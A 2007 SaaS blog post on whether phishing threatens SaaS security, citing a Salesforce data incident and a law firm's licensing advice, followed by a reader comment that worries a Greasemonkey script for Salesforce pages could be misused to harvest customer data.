SaaS Week« Five Reasons Why Companies are Choosing SaaS | Main | BEA Announces Project Genesis to Enable SaaS for ISVs »
December 09, 2007Does Phishing Pose a Risk to SaaS Security?
A press release from Epstein Becker & Green, P.C. highlights the risk that SaaS applications may face from phishing, pointing to a November incident in which a SalesForce.com was tricked into revealing a customer contact list.
In its press release, William H. venema of the firm's Dallas office claims, "Proper structuring of software licensing arrangements can help protect users against security breaches such as those that occurred at SalesForce.com." He then suggests that licenses include provisions that address server and technician security.
If you are using or offering SaaS applications, what's your take on the risk posed by phishing? Post your comments here.
Posted by krissidanielsson in
|
Digg This|
Add to del.icio.us
Trackback Pings
TrackBack URL for this entry:
http://www.ebizq.net/mt/mt-tb.cgi/2947
If you want to be worried then consider this
http://www.japaninyourpalm.com/hacks/salesforcecoldcall.html
The site claims to offer a plugin for the FireFox browser, it looks like a simple Java Script, that will extract data from your SalesForce application screen and place it in links to search engines and social networking sites so you can do some information digging on your 'prospect'.
If it works then (and with the word hack in the URL you have to wonder) then next simple step is to harvest all the information from the SalesForce Application screen and send it off to whoever might be interested in it.
They then get to construct really convincing e-mails to your customers for whatever purpose they might have in mind.
Amazingly good for anything that runs under WEB2.0 on a browser. Please tell me that it does not work. It's not as if the WEB2.0 developers have much control over browser security and it's not very credible to say to people 'Ooooh, you must be careful'.
Here's some of the text from the site.... I'm sure someone will want to shut it down, quite right too.
"Salesforce.com Cold Call Greasemonkey script
Want some recent news on your next call's business and competitors? With this script installed, we'll automatically add search links to Hoovers, Google News, Yahoo News, Technorati, YouTube and Wikipedia on your Account pages in Salesforce.com. The query words for your account's company name are built into the links. (Already have Greasemonkey? Get the script now.)
How does it work ?
Runs on top of the Saleforce.com Account web page. Doesn't alter the salesforce.com application. Injects a tiny bit of javascript every time you pull up a Salesforce.com Account page Locates the area to the right of the
"Account Detail" header Finds the name of the company in the Account Name field Builds new html and image links to the news resources and inserts this html in the Account Detail header, on the right This script only functions on the Account page Has no affect on the rest of the salesforce.com web pages or any other web pages.
This script only works on the Firefox browser
This script only affects your local view on your machine. i.e. nobody else sees it this way unless they've also installed the Salesforce Cold Call script. The Salesforce application has no knowledge of this script running on your machine.
Security is not an issue. You are not providing your salesforce.com password to the script or anything like this. The script only runs on your local browser, and you need to be signed into salesforce.com as usual. This script simply adds the html to the news links."
Of course we really believe it only does what it says it does.
Dave
Posted by: Dave at December 10, 2007 07:27 PM | Permalink
Post a comment
